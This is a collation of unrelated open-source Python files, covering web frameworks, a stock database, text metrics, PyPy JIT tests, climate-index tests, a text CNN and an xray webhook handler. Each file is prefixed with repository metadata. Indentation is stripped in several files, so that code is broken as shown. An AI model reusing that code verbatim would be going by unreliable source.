# cd /mnt/nvme/data/dwi/tractometry_test
# plot_tractometry_results -i subjects.txt -o tractometry_result_group.png --mc --save_csv --plot3D metric
|
flask_security/models/__init__.py | briancappello/flask-security | 317 | 12658351 |
""""
Copyright 2019 by <NAME> (jwag). All rights reserved.
:license: MIT, see LICENSE for more details.
This package contains OPTIONAL models for various ORMs/databases that can be used
to quickly get the required DB models setup.
These models have the fields for ALL features. This makes it easy for applications
to add features w/o a DB migration (and modern DBs are pretty efficient at storing
empty values!).
"""
|
lib/cheroot/__init__.py | 0x20Man/Watcher3 | 320 | 12658354 | """Cheroot is the high-performance, pure-Python HTTP server used by CherryPy."""
try:
import pkg_resources
except ImportError:
pass
try:
__version__ = pkg_resources.get_distribution('cheroot').version
except Exception:
__version__ = 'unknown'
|
stocklook/apis/yahoo_db/database.py | zbarge/stocklook | 149 | 12658357 | import datetime
import logging
import os
import pandas as pd
from sqlalchemy import create_engine, and_
from sqlalchemy.orm import sessionmaker
from yahoo_finance import Share, YQLResponseMalformedError
from stocklook.utils.formatters import get_stock_data, field_map, get_stock_data_historical
from .tables import Quote, Stock, Base, WatchList
logger = logging.getLogger()
logger.setLevel(logging.INFO)
DATA_DIR = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'data')
if not os.path.exists(DATA_DIR):
os.mkdir(DATA_DIR)
DEFAULT_DATABASE_PATH = os.path.join(DATA_DIR, 'db.sqlite3')
engine = create_engine('sqlite:///' + DEFAULT_DATABASE_PATH)
Session = sessionmaker(bind=engine)
stock_keys = Stock.__dict__.keys()
quote_keys = Quote.__dict__.keys()
class StockDatabase:
STOCK_TIMES = [[5, 30], [13, 30]]
def __init__(self, symbols=None):
Base.metadata.create_all(bind=engine, checkfirst=True)
self._symbols = symbols
def _add_stock(self, session, name, data=None):
if data is None:
try:
data = get_stock_data(Share(name), field_map)
except:
return None
stock = Stock(**{k: v for k, v in data.items() if k in stock_keys})
try:
session.add(stock)
except:
pass
return data
def seconds_until_market_open(self):
open, close = self.STOCK_TIMES
ohour, omin = open
chour, cmin = close
osec = (ohour*60*60) + (omin*60)
csec = (chour*60*60) + (cmin*60)
today = datetime.datetime.now()
tsec = (today.hour*60*60) + (today.minute*60)
weekday = today.weekday()
if weekday < 5:
add = 0
elif weekday == 5:
add = (48*60*60)-tsec
elif weekday == 6:
add = (24*60*60)-tsec
if tsec > csec:
sec = (24*60*60)-tsec+osec+add
#logger.info("STMO1: Stock market opens in {} hours".format(round(sec/60/60),2))
elif tsec < osec:
sec = osec-tsec+add
#logger.info("STMO2: Stock market opens in {} hours".format(round(sec / 60 / 60), 2))
else:
#logger.info("STMO3: Stock market is currently open")
sec = 0 + add
return sec
def get_quote_latest(self, session, stock):
return session.query(Quote)\
.filter(Quote.stock_id == stock.id)\
.order_by(Quote.date_inserted.desc())\
.limit(1)\
.one_or_none()
def get_quote(self, session, stock, data=None):
update_time = pd.Timestamp(datetime.datetime.now()) - pd.DateOffset(minutes=15)
if stock is None or not hasattr(stock, 'quotes') or not hasattr(stock, 'symbol'):
return None
seconds = self.seconds_until_market_open()
quote = self.get_quote_latest(session, stock)
market_closed = (seconds > 15*60)
if quote is None \
or (not market_closed and quote.date_inserted <= update_time)\
or (market_closed and quote.date_inserted.minute < 30 and quote.date_inserted.hour == 13):
if data is None:
data = get_stock_data(Share(stock.symbol), field_map)
quote = Quote(**{k: v
for k, v in data.items()
if k in quote_keys})
logger.info("UPDATED QUOTE: {}".format(quote))
stock.quotes.append(quote)
else:
logging.info("EXISTING QUOTE: {}".format(quote))
return quote
def get_quotes(self, session, stocks):
return [self.get_quote(session, s) for s in stocks]
def get_stock(self, session, symbol):
symbol = symbol.upper()
query = session.query(Stock).filter(Stock.symbol == symbol)
stock = query.one_or_none()
if stock is None:
self._add_stock(session, symbol)
else:
return stock
return query.one_or_none()
def get_stocks(self, session, symbols):
return [self.get_stock(session, s) for s in symbols]
def get_session(self):
return Session()
def update_stocks(self, session, stocks=None):
if not stocks:
stocks = session.query(Stock).all()
try:
return self.get_quotes(session, stocks)
except Exception as e:
logger.error("Error getting quotes: {}".format(e))
session.rollback()
def update_historical(self, session, stock, start_date, end_date):
share = Share(stock.symbol)
try:
data = get_stock_data_historical(share, start_date, end_date)
except YQLResponseMalformedError as e:
logger.error(e)
return None
matching_quotes = session.query(Quote).filter(and_(Quote.stock_id == stock.id,
Quote.date_last_traded >= pd.Timestamp(start_date),
Quote.date_last_traded <= pd.Timestamp(end_date)))\
.order_by(Quote.date_inserted.asc())
dates = [pd.Timestamp(q.date_last_traded).date() for q in matching_quotes.all()
if pd.Timestamp(q.date_last_traded).hour > 13]
quotes = []
for record in data:
try:
if record[Quote.date_last_traded.name].date() not in dates:
quote = Quote(**{k: v
for k, v in record.items()
if k in quote_keys})
quote.symbol_name = stock.symbol_name
quote.stock_exchange = stock.stock_exchange
quote.trade_currency = stock.trade_currency
quotes.append(quote)
stock.quotes.append(quote)
except (KeyError, ValueError) as e:
logger.error("Error parsing historical quote - {} - {}".format(e, record))
[session.add(q) for q in quotes]
return quotes
def update_historicals(self, session, stocks=None, start_date=None, end_date=None):
now = pd.Timestamp(datetime.datetime.now())
if start_date is None:
start_date = now - pd.DateOffset(years=1)
if end_date is None:
end_date = now
return [self.update_historical(session, s, start_date, end_date) for s in stocks]
def get_watchlist(self, session, name):
return session.query(WatchList).filter(WatchList.name == name).one_or_none()
def add_watchlist(self, session, name, tickers=None):
exists = self.get_watchlist(session, name)
if exists is None:
w = WatchList(name=name)
session.add(w)
else:
w = exists
if tickers is not None:
stocks = self.get_stocks(session, tickers)
for s in stocks:
if s in w.stocks:
continue
w.stocks.append(s)
return w
def delete_watchlist(self, session, name):
session.query(WatchList).filter(WatchList.name == name).delete()
def add_watchlist_stocks(self, session, watchlist, tickers):
stocks = self.get_stocks(session, tickers)
for s in stocks:
if s in watchlist.stocks:
continue
watchlist.stocks.append(s)
def delete_watchlist_stocks(self, session, watchlist, tickers):
for stock in watchlist.stocks:
if stock.symbol in tickers:
session.delete(stock)
return watchlist
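# --- Illustrative usage (not part of the original module) ---
# A minimal sketch, assuming the yahoo_finance dependency is still usable;
# the ticker symbols are arbitrary examples.
if __name__ == '__main__':
    db = StockDatabase()
    session = db.get_session()
    stocks = db.get_stocks(session, ['AAPL', 'MSFT'])
    db.update_stocks(session, stocks)
    session.commit()
    session.close()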
|
shorttext/metrics/embedfuzzy/jaccard.py | vishalbelsare/PyShortTextCategorization | 481 | 12658413 |
from itertools import product
import numpy as np
from scipy.spatial.distance import cosine
from shorttext.utils import tokenize
def jaccardscore_sents(sent1, sent2, wvmodel, sim_words=lambda vec1, vec2: 1-cosine(vec1, vec2)):
""" Compute the Jaccard score between sentences based on their word similarities.
:param sent1: first sentence
:param sent2: second sentence
    :param wvmodel: word-embedding model
:param sim_words: function for calculating the similarities between a pair of word vectors (default: cosine)
:return: soft Jaccard score
:type sent1: str
:type sent2: str
:type wvmodel: gensim.models.keyedvectors.KeyedVectors
:type sim_words: function
:rtype: float
"""
tokens1 = tokenize(sent1)
tokens2 = tokenize(sent2)
tokens1 = list(filter(lambda w: w in wvmodel, tokens1))
tokens2 = list(filter(lambda w: w in wvmodel, tokens2))
allowable1 = [True] * len(tokens1)
allowable2 = [True] * len(tokens2)
simdict = {(i, j): sim_words(wvmodel[tokens1[i]], wvmodel[tokens2[j]])
for i, j in product(range(len(tokens1)), range(len(tokens2)))}
intersection = 0.0
simdictitems = sorted(simdict.items(), key=lambda s: s[1], reverse=True)
for idxtuple, sim in simdictitems:
i, j = idxtuple
if allowable1[i] and allowable2[j]:
intersection += sim
allowable1[i] = False
allowable2[j] = False
union = len(tokens1) + len(tokens2) - intersection
if union > 0:
return intersection / union
elif intersection == 0:
return 1.
else:
return np.inf
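# --- Illustrative usage (not part of the original module) ---
# A minimal sketch, assuming gensim >= 4.0 for KeyedVectors.add_vectors and that
# the package's own tokenizer dependencies are installed; the toy vectors below
# are made up purely for demonstration.
if __name__ == '__main__':
    from gensim.models import KeyedVectors

    toy_model = KeyedVectors(vector_size=3)
    toy_model.add_vectors(['cat', 'dog', 'pet'],
                          np.array([[1.0, 0.0, 0.0],
                                    [0.9, 0.1, 0.0],
                                    [0.8, 0.2, 0.1]]))
    print(jaccardscore_sents('cat pet', 'dog pet', toy_model))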
|
Chapter12/sample_http_server.py | JTamarit/Tkinter_libro | 173 | 12658422 | from http.server import HTTPServer, BaseHTTPRequestHandler
class TestHandler(BaseHTTPRequestHandler):
def _print_request_data(self):
content_length = self.headers['Content-Length']
print("Content-length: {}".format(content_length))
data = self.rfile.read(int(content_length))
print(data.decode('utf-8'))
def _send_200(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_POST(self, *args, **kwargs):
print('POST request received')
self._print_request_data()
self._send_200()
def do_PUT(self, *args, **kwargs):
print("PUT request received")
self._print_request_data()
self._send_200()
def run(server_class=HTTPServer, handler_class=TestHandler):
server_address = ('', 8000)
httpd = server_class(server_address, handler_class)
httpd.serve_forever()
run()
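# --- Illustrative client calls (not part of the original example) ---
# With the server running, the handlers above can be exercised from another
# shell, for instance:
#   curl -X POST --data 'key=value' http://localhost:8000
#   curl -X PUT --data 'key=value' http://localhost:8000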
|
brownie/network/middlewares/geth_poa.py | ActorForth/brownie | 1,595 | 12658431 | from typing import Callable, Dict, List, Optional
from web3 import Web3
from web3.exceptions import ExtraDataLengthError
from web3.middleware import geth_poa_middleware
from brownie.network.middlewares import BrownieMiddlewareABC
class GethPOAMiddleware(BrownieMiddlewareABC):
@classmethod
def get_layer(cls, w3: Web3, network_type: str) -> Optional[int]:
try:
w3.eth.get_block("latest")
return None
except ExtraDataLengthError:
return -1
def process_request(self, make_request: Callable, method: str, params: List) -> Dict:
middleware_fn = geth_poa_middleware(make_request, self.w3)
return middleware_fn(method, params)
|
tests/jit/__init__.py | ldelebec/asteroid | 722 | 12658505 |
import pytest
ignored_warnings = [
"ignore:torch.tensor results are registered as constants in the trace.",
"ignore:Converting a tensor to a Python boolean might cause the trace to be incorrect.",
"ignore:Converting a tensor to a Python float might cause the trace to be incorrect.",
"ignore:Using or importing the ABCs from",
]
pytestmark = pytest.mark.filterwarnings(*ignored_warnings)
|
modelchimp/views/api/experiment_metric.py | samzer/modelchimp-server | 134 | 12658511 | from rest_framework import status, viewsets
from rest_framework.response import Response
from rest_framework import mixins
from modelchimp.models.experiment import Experiment
from modelchimp.api_permissions import HasProjectMembership
from rest_framework.permissions import IsAuthenticated
class ExperimentMetricAPI(mixins.RetrieveModelMixin,
viewsets.GenericViewSet):
queryset = Experiment.objects.all()
permission_classes = (IsAuthenticated, HasProjectMembership)
def retrieve(self, request, model_id, *args, **kwargs):
instance= self.get_queryset().get(id=model_id)
result = dict()
result['summary'] = []
result['metric'] = instance.metrics
result['duration'] = instance.durations
if not result['metric']:
return Response(result, status=status.HTTP_200_OK)
for metric in result['metric']['metric_list']:
# Get the max and min value
metric_max = 0
metric_min = 0
for i,m in enumerate(result['metric']['evaluation'][metric]):
current_value = m['value']
if i == 0:
metric_max = current_value
metric_min = current_value
continue
if current_value > metric_max:
metric_max = current_value
if current_value < metric_min:
metric_min = current_value
metric_dict = dict()
metric_dict['name'] = metric
metric_dict['max'] = metric_max
metric_dict['min'] = metric_min
result['summary'].append(metric_dict)
return Response(result, status=status.HTTP_200_OK)
|
problems/building-h2o/building_h2o.py | jianpingbadao/leetcode | 198 | 12658537 |
#!/usr/bin/env python
class H2O:
def __init__(self):
pass
def hydrogen(self, releaseHydrogen: 'Callable[[], None]') -> None:
# releaseHydrogen() outputs "H". Do not change or remove this line.
releaseHydrogen()
def oxygen(self, releaseOxygen: 'Callable[[], None]') -> None:
# releaseOxygen() outputs "O". Do not change or remove this line.
releaseOxygen() |
xclim/testing/tests/test_utils.py | ECCC-CCCS/xclim | 169 | 12658539 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Test for utils
from inspect import signature
import numpy as np
import xarray as xr
from xclim.core.indicator import Daily
from xclim.core.utils import (
ensure_chunk_size,
nan_calc_percentiles,
walk_map,
wrapped_partial,
)
def test_walk_map():
d = {"a": -1, "b": {"c": -2}}
o = walk_map(d, lambda x: 0)
assert o["a"] == 0
assert o["b"]["c"] == 0
def test_wrapped_partial():
def func(a, b=1, c=1):
"""Docstring"""
return (a, b, c)
newf = wrapped_partial(func, b=2)
assert list(signature(newf).parameters.keys()) == ["a", "c"]
assert newf(1) == (1, 2, 1)
newf = wrapped_partial(func, suggested=dict(c=2), b=2)
assert list(signature(newf).parameters.keys()) == ["a", "c"]
assert newf(1) == (1, 2, 2)
assert newf.__doc__ == func.__doc__
def func(a, b=1, c=1, **kws):
"""Docstring"""
return (a, b, c)
newf = wrapped_partial(func, suggested=dict(c=2), a=2, b=2)
assert list(signature(newf).parameters.keys()) == ["c", "kws"]
assert newf() == (2, 2, 2)
def test_wrapped_indicator(tas_series):
def indice(
tas: xr.DataArray,
tas2: xr.DataArray = None,
thresh: int = float,
freq: str = "YS",
):
if tas2 is None:
out = tas < thresh
else:
out = tas < tas2
out = out.resample(time="YS").sum()
out.attrs["units"] = "days"
return out
ind1 = Daily(
realm="atmos",
identifier="test_ind1",
units="days",
compute=wrapped_partial(indice, tas2=None),
)
ind2 = Daily(
realm="atmos",
identifier="test_ind2",
units="days",
compute=wrapped_partial(indice, thresh=None),
)
tas = tas_series(np.arange(366), start="2000-01-01")
tas2 = tas_series(1 + np.arange(366), start="2000-01-01")
assert ind2(tas, tas2) == 366
assert ind1(tas, thresh=1111) == 366
def test_ensure_chunk_size():
da = xr.DataArray(np.zeros((20, 21, 20)), dims=("x", "y", "z"))
out = ensure_chunk_size(da, x=10, y=-1)
assert da is out
dac = da.chunk({"x": (1,) * 20, "y": (10, 10, 1), "z": (10, 10)})
out = ensure_chunk_size(dac, x=3, y=5, z=-1)
assert out.chunks[0] == (3, 3, 3, 3, 3, 5)
assert out.chunks[1] == (10, 11)
assert out.chunks[2] == (20,)
class Test_nan_calc_percentiles:
def test_calc_perc_type7(self):
        # Example array from: https://en.wikipedia.org/wiki/Percentile#The_nearest-rank_method
arr = np.asarray([15.0, 20.0, 35.0, 40.0, 50.0])
res = nan_calc_percentiles(arr, percentiles=[40.0], alpha=1, beta=1)
# The expected is from R `quantile(arr, probs=c(0.4), type=7)`
assert res[()] == 29
def test_calc_perc_type8(self):
        # Example array from: https://en.wikipedia.org/wiki/Percentile#The_nearest-rank_method
arr = np.asarray(
[[15.0, 20.0, 35.0, 40.0, 50.0], [15.0, 20.0, 35.0, 40.0, 50.0]]
)
res = nan_calc_percentiles(
arr,
percentiles=[40.0],
alpha=1.0 / 3.0,
beta=1.0 / 3.0,
)
# The expected is from R `quantile(arr, probs=c(0.4), type=8)`
assert np.all(res[0][0] == 27)
assert np.all(res[0][1] == 27)
def test_calc_perc_2d(self):
        # Example array from: https://en.wikipedia.org/wiki/Percentile#The_nearest-rank_method
arr = np.asarray(
[[15.0, 20.0, 35.0, 40.0, 50.0], [15.0, 20.0, 35.0, 40.0, 50.0]]
)
res = nan_calc_percentiles(arr, percentiles=[40.0])
# The expected is from R ` quantile(c(15.0, 20.0, 35.0, 40.0, 50.0), probs=0.4)`
assert np.all(res[0][0] == 29)
assert np.all(res[0][1] == 29)
def test_calc_perc_nan(self):
arr = np.asarray([np.NAN])
res = nan_calc_percentiles(arr, percentiles=[50.0])
assert np.isnan(res)
def test_calc_perc_empty(self):
arr = np.asarray([])
res = nan_calc_percentiles(arr)
assert np.isnan(res)
def test_calc_perc_partial_nan(self):
arr = np.asarray([np.NaN, 41.0, 41.0, 43.0, 43.0])
res = nan_calc_percentiles(arr, percentiles=[50.0], alpha=1 / 3.0, beta=1 / 3.0)
# The expected is from R `quantile(arr, 0.5, type=8, na.rm = TRUE)`
# Note that scipy mquantiles would give a different result here
assert res[()] == 42.0
|
CommonTools/ParticleFlow/python/Isolation/pfIsolatedMuons_cfi.py | ckamtsikis/cmssw | 852 | 12658557 |
import FWCore.ParameterSet.Config as cms
pfIsolatedMuons = cms.EDFilter(
"PFCandidateFwdPtrCollectionStringFilter",
src = cms.InputTag("pfMuonsFromVertex"),
cut = cms.string("pt > 5 & muonRef.isAvailable() & "\
"muonRef.pfIsolationR04().sumChargedHadronPt + "\
"muonRef.pfIsolationR04().sumNeutralHadronEt + "\
"muonRef.pfIsolationR04().sumPhotonEt "\
" < 0.15 * pt "
),
makeClones = cms.bool(True)
)
|
pywemo/ouimeaux_device/outdoor_plug.py | sullivanmj/pywemo | 102 | 12658583 |
"""Representation of a WeMo OutdoorPlug device."""
from .switch import Switch
class OutdoorPlug(Switch):
"""Representation of a WeMo Motion device."""
|
rpython/jit/metainterp/optimizeopt/test/test_guard.py | nanjekyejoannah/pypy | 333 | 12658588 | <reponame>nanjekyejoannah/pypy
from rpython.jit.metainterp import compile
from rpython.jit.metainterp.history import Const
from rpython.jit.metainterp.optimizeopt.dependency import (
DependencyGraph, IndexVar)
from rpython.jit.metainterp.optimizeopt.guard import (GuardStrengthenOpt,
Guard)
from rpython.jit.metainterp.optimizeopt.test.test_schedule import SchedulerBaseTest
from rpython.jit.metainterp.optimizeopt.test.test_vecopt import FakeLoopInfo
from rpython.jit.metainterp.resoperation import (rop,
ResOperation, InputArgInt)
class FakeMemoryRef(object):
def __init__(self, array, iv):
self.index_var = iv
self.array = array
def is_adjacent_to(self, other):
if self.array is not other.array:
return False
iv = self.index_var
ov = other.index_var
val = (int(str(ov.var)[1:]) - int(str(iv.var)[1:]))
# i0 and i1 are adjacent
# i1 and i0 ...
# but not i0, i2
# ...
return abs(val) == 1
class FakeOp(object):
def __init__(self, cmpop):
self.boolinverse = ResOperation(cmpop, [box(0), box(0)], None).boolinverse
self.cmpop = cmpop
def getopnum(self):
return self.cmpop
def getarg(self, index):
if index == 0:
return 'lhs'
elif index == 1:
return 'rhs'
else:
assert 0
class FakeResOp(object):
def __init__(self, opnum):
self.opnum = opnum
def getopnum(self):
return self.opnum
def box(value):
return InputArgInt(value)
def const(value):
return Const._new(value)
def iv(value, coeff=(1,1,0)):
var = IndexVar(value)
var.coefficient_mul = coeff[0]
var.coefficient_div = coeff[1]
var.constant = coeff[2]
return var
def guard(opnum):
def guard_impl(cmpop, lhs, rhs):
guard = Guard(0, FakeResOp(opnum), FakeOp(cmpop), {'lhs': lhs, 'rhs': rhs})
return guard
return guard_impl
guard_true = guard(rop.GUARD_TRUE)
guard_false = guard(rop.GUARD_FALSE)
del guard
class TestGuard(SchedulerBaseTest):
def optguards(self, loop, user_code=False):
info = FakeLoopInfo(loop)
info.snapshot(loop)
for op in loop.operations:
if op.is_guard():
op.setdescr(compile.CompileLoopVersionDescr())
dep = DependencyGraph(loop)
opt = GuardStrengthenOpt(dep.index_vars)
opt.propagate_all_forward(info, loop, user_code)
return opt
def assert_guard_count(self, loop, count):
guard = 0
for op in loop.operations + loop.prefix:
if op.is_guard():
guard += 1
if guard != count:
self.debug_print_operations(loop)
assert guard == count
def assert_contains_sequence(self, loop, instr):
class Glob(object):
next = None
prev = None
def __repr__(self):
return '*'
from rpython.jit.tool.oparser import OpParser, default_fail_descr
parser = OpParser(instr, self.cpu, self.namespace, None, default_fail_descr, True, None)
parser.vars = { arg.repr_short(arg._repr_memo) : arg for arg in loop.inputargs}
operations = []
last_glob = None
prev_op = None
for line in instr.splitlines():
line = line.strip()
if line.startswith("#") or \
line == "":
continue
if line.startswith("..."):
last_glob = Glob()
last_glob.prev = prev_op
operations.append(last_glob)
continue
op = parser.parse_next_op(line)
if last_glob is not None:
last_glob.next = op
last_glob = None
operations.append(op)
def check(op, candidate, rename):
m = 0
if isinstance(candidate, Glob):
if candidate.next is None:
return 0 # consumes the rest
if op.getopnum() != candidate.next.getopnum():
return 0
m = 1
candidate = candidate.next
if op.getopnum() == candidate.getopnum():
for i,arg in enumerate(op.getarglist()):
oarg = candidate.getarg(i)
if arg in rename:
assert rename[arg].same_box(oarg)
else:
rename[arg] = oarg
if not op.returns_void():
rename[op] = candidate
m += 1
return m
return 0
j = 0
rename = {}
ops = loop.finaloplist()
for i, op in enumerate(ops):
candidate = operations[j]
j += check(op, candidate, rename)
if isinstance(operations[-1], Glob):
assert j == len(operations)-1, self.debug_print_operations(loop)
else:
assert j == len(operations), self.debug_print_operations(loop)
def test_basic(self):
loop1 = self.parse_trace("""
i10 = int_lt(i1, 42)
guard_true(i10) []
i101 = int_add(i1, 1)
i102 = int_lt(i101, 42)
guard_true(i102) []
""")
opt = self.optguards(loop1)
self.assert_guard_count(loop1, 1)
self.assert_contains_sequence(loop1, """
...
i101 = int_add(i1, 1)
i12 = int_lt(i101, 42)
guard_true(i12) []
...
""")
def test_basic_sub(self):
loop1 = self.parse_trace("""
i10 = int_gt(i1, 42)
guard_true(i10) []
i101 = int_sub(i1, 1)
i12 = int_gt(i101, 42)
guard_true(i12) []
""")
opt = self.optguards(loop1)
self.assert_guard_count(loop1, 1)
self.assert_contains_sequence(loop1, """
...
i101 = int_sub(i1, 1)
i12 = int_gt(i101, 42)
guard_true(i12) []
...
""")
def test_basic_mul(self):
loop1 = self.parse_trace("""
i10 = int_mul(i1, 4)
i20 = int_lt(i10, 42)
guard_true(i20) []
i12 = int_add(i10, 1)
i13 = int_lt(i12, 42)
guard_true(i13) []
""")
opt = self.optguards(loop1)
self.assert_guard_count(loop1, 1)
self.assert_contains_sequence(loop1, """
...
i101 = int_mul(i1, 4)
i12 = int_add(i101, 1)
i13 = int_lt(i12, 42)
guard_true(i13) []
...
""")
def test_compare(self):
key = box(1)
incomparable = (False, 0)
# const const
assert iv(const(42)).compare(iv(const(42))) == (True, 0)
assert iv(const(-400)).compare(iv(const(-200))) == (True, -200)
assert iv(const(0)).compare(iv(const(-1))) == (True, 1)
# var const
assert iv(key, coeff=(1,1,0)).compare(iv(const(42))) == incomparable
assert iv(key, coeff=(5,70,500)).compare(iv(const(500))) == incomparable
# var var
assert iv(key, coeff=(1,1,0)).compare(iv(key,coeff=(1,1,0))) == (True, 0)
assert iv(key, coeff=(1,7,0)).compare(iv(key,coeff=(1,7,0))) == (True, 0)
assert iv(key, coeff=(4,7,0)).compare(iv(key,coeff=(3,7,0))) == incomparable
assert iv(key, coeff=(14,7,0)).compare(iv(key,coeff=(2,1,0))) == (True, 0)
assert iv(key, coeff=(14,7,33)).compare(iv(key,coeff=(2,1,0))) == (True, 33)
assert iv(key, coeff=(15,5,33)).compare(iv(key,coeff=(3,1,33))) == (True, 0)
def test_imply_basic(self):
key = box(1)
# if x < 42 <=> x < 42
g1 = guard_true(rop.INT_LT, iv(key, coeff=(1,1,0)), iv(const(42)))
g2 = guard_true(rop.INT_LT, iv(key, coeff=(1,1,0)), iv(const(42)))
assert g1.implies(g2)
assert g2.implies(g1)
# if x+1 < 42 => x < 42
g1 = guard_true(rop.INT_LT, iv(key, coeff=(1,1,1)), iv(const(42)))
g2 = guard_true(rop.INT_LT, iv(key, coeff=(1,1,0)), iv(const(42)))
assert g1.implies(g2)
assert not g2.implies(g1)
# if x+2 < 42 => x < 39
# counter: 39+2 < 42 => 39 < 39
g1 = guard_true(rop.INT_LT, iv(key, coeff=(1,1,2)), iv(const(42)))
g2 = guard_true(rop.INT_LT, iv(key, coeff=(1,1,0)), iv(const(39)))
assert not g1.implies(g2)
assert not g2.implies(g1)
# if x+2 <= 42 => x <= 43
g1 = guard_true(rop.INT_LE, iv(key, coeff=(1,1,2)), iv(const(42)))
g2 = guard_true(rop.INT_LE, iv(key, coeff=(1,1,0)), iv(const(43)))
assert g1.implies(g2)
assert not g2.implies(g1)
# if x*13/3+1 <= 0 => x*13/3 <= -1
# is true, but the implies method is not smart enough
g1 = guard_true(rop.INT_LE, iv(key, coeff=(13,3,1)), iv(const(0)))
g2 = guard_true(rop.INT_LE, iv(key, coeff=(13,3,0)), iv(const(-1)))
assert not g1.implies(g2)
assert not g2.implies(g1)
# > or >=
# if x > -55 => x*2 > -44
# counter: -44 > -55 (True) => -88 > -44 (False)
g1 = guard_true(rop.INT_GT, iv(key, coeff=(1,1,0)), iv(const(-55)))
g2 = guard_true(rop.INT_GT, iv(key, coeff=(2,1,0)), iv(const(-44)))
assert not g1.implies(g2)
assert not g2.implies(g1)
# if x*2/2 > -44 => x*2/2 > -55
g1 = guard_true(rop.INT_GE, iv(key, coeff=(2,2,0)), iv(const(-44)))
g2 = guard_true(rop.INT_GE, iv(key, coeff=(2,2,0)), iv(const(-55)))
assert g1.implies(g2)
assert not g2.implies(g1)
def test_imply_coeff(self):
key = box(1)
key2 = box(2)
# if x > y * 9/3 => x > y
# counter: x = -2, y = -1, -2 > -3 => -2 > -1, True => False
g1 = guard_true(rop.INT_GT, iv(key, coeff=(1,1,0)), iv(box(1),coeff=(9,3,0)))
g2 = guard_true(rop.INT_GT, iv(key, coeff=(1,1,0)), iv(box(1),coeff=(1,1,0)))
assert not g1.implies(g2)
assert not g2.implies(g1)
# if x > y * 15/5 <=> x > y * 3
g1 = guard_true(rop.INT_GT, iv(key, coeff=(1,1,0)), iv(key2,coeff=(15,5,0)))
g2 = guard_true(rop.INT_GT, iv(key, coeff=(1,1,0)), iv(key2,coeff=(3,1,0)))
assert g1.implies(g2)
assert g2.implies(g1)
# x >= y => x*3-5 >= y
# counter: 1 >= 0 => 1*3-5 >= 0 == -2 >= 0, True => False
g1 = guard_true(rop.INT_GE, iv(key, coeff=(1,1,0)), iv(key2))
g2 = guard_true(rop.INT_GE, iv(key, coeff=(3,1,-5)), iv(key2))
assert not g1.implies(g2)
assert not g2.implies(g1)
        # guard false inverts >= to <
# x < y => x*3-5 < y
# counter: 3 < 4 => 3*3-5 < 4 == 4 < 4, True => False
g1 = guard_false(rop.INT_GE, iv(key, coeff=(1,1,0)), iv(key2))
g2 = guard_false(rop.INT_GE, iv(key, coeff=(3,1,-5)), iv(key2))
assert not g1.implies(g2)
assert not g2.implies(g1)
# x <= y => x*3-5 > y
# counter: 3 < 4 => 3*3-5 < 4 == 4 < 4, True => False
g1 = guard_false(rop.INT_GT, iv(key, coeff=(1,1,0)), iv(key2))
g2 = guard_true(rop.INT_GT, iv(key, coeff=(3,1,-5)), iv(key2))
assert not g1.implies(g2)
assert not g2.implies(g1)
def test_collapse(self):
loop1 = self.parse_trace("""
i10 = int_gt(i1, 42)
guard_true(i10) []
i11 = int_add(i1, 1)
i12 = int_gt(i11, i2)
guard_true(i12) []
""")
opt = self.optguards(loop1, True)
self.assert_guard_count(loop1, 2)
self.assert_contains_sequence(loop1, """
...
i100 = int_ge(42, i2)
guard_true(i100) []
...
i40 = int_gt(i1, 42)
guard_true(i40) []
...
""")
|
tests/components/nina/__init__.py | MrDelik/core | 30,023 | 12658609 | """Tests for the Nina integration."""
import json
from typing import Any
from tests.common import load_fixture
def mocked_request_function(url: str) -> dict[str, Any]:
"""Mock of the request function."""
dummy_response: dict[str, Any] = json.loads(
load_fixture("sample_warnings.json", "nina")
)
dummy_response_details: dict[str, Any] = json.loads(
load_fixture("sample_warning_details.json", "nina")
)
if url == "https://warnung.bund.de/api31/dashboard/083350000000.json":
return dummy_response
warning_id = url.replace("https://warnung.bund.de/api31/warnings/", "").replace(
".json", ""
)
return dummy_response_details[warning_id]
|
chapter8_PyTorch项目实战/text_classification/model.py | Tisword/pytorch-in-action | 164 | 12658629 | <reponame>Tisword/pytorch-in-action
import torch
import torch.nn as nn
import torch.nn.functional as F
class CNN_Text(nn.Module):
def __init__(self, args):
super(CNN_Text, self).__init__()
self.args = args
embed_num = args.embed_num
embed_dim = args.embed_dim
class_num = args.class_num
Ci = 1
kernel_num = args.kernel_num
kernel_sizes = args.kernel_sizes
self.embed = nn.Embedding(embed_num, embed_dim)
self.convs_list = nn.ModuleList(
[nn.Conv2d(Ci, kernel_num, (kernel_size, embed_dim)) for kernel_size in kernel_sizes])
self.dropout = nn.Dropout(args.dropout)
self.fc = nn.Linear(len(kernel_sizes) * kernel_num, class_num)
    def forward(self, x):
        x = self.embed(x)  # (N, W, D): batch, sequence length, embedding dim
        x = x.unsqueeze(1)  # (N, 1, W, D), add a channel dimension for Conv2d
        x = [F.relu(conv(x)).squeeze(3) for conv in self.convs_list]  # [(N, kernel_num, W-k+1), ...]
        x = [F.max_pool1d(i, i.size(2)).squeeze(2) for i in x]  # [(N, kernel_num), ...]
        x = torch.cat(x, 1)  # (N, kernel_num * len(kernel_sizes))
        x = self.dropout(x)
        x = x.view(x.size(0), -1)
        logit = self.fc(x)
        return logit
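# --- Illustrative usage (not part of the original model file) ---
# A minimal sketch with made-up hyperparameters: build the model from a plain
# namespace and push a random batch of token ids through it.
if __name__ == '__main__':
    from argparse import Namespace

    args = Namespace(embed_num=100, embed_dim=8, class_num=2,
                     kernel_num=4, kernel_sizes=[3, 4, 5], dropout=0.5)
    model = CNN_Text(args)
    tokens = torch.randint(0, args.embed_num, (2, 20))  # batch of 2, sequence length 20
    print(model(tokens).shape)  # expected: torch.Size([2, 2])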
|
webhook/views/views.py | nobgr/xray | 7,086 | 12658636 | import datetime
from datetime import datetime
from executor.executor import dispatch_web_vuln, dispatch_service_vuln, dispatch_statistics
from model.vuln import Statistics, WebVuln, WebParam, WebParamPosition, WebRequest, WebResponse, ServiceVuln
def process_web_vuln(instance, data):
"""将 web 漏洞 json 转换为相关 model"""
detail = data["detail"]
p = detail["param"]
if p:
param = WebParam(key=p["key"], value=p["value"], position=WebParamPosition(p["position"]))
else:
param = None
request = []
response = []
extra = {}
for i in range(0, 10):
req_key = f"request{i}" if i else "request"
resp_key = f"response{i}" if i else "response"
req = detail.get(req_key)
resp = detail.get(resp_key)
if req == "" or resp == "":
continue
if req is None or resp is None:
break
request.append(WebRequest(raw=req))
response.append(WebResponse(raw=resp))
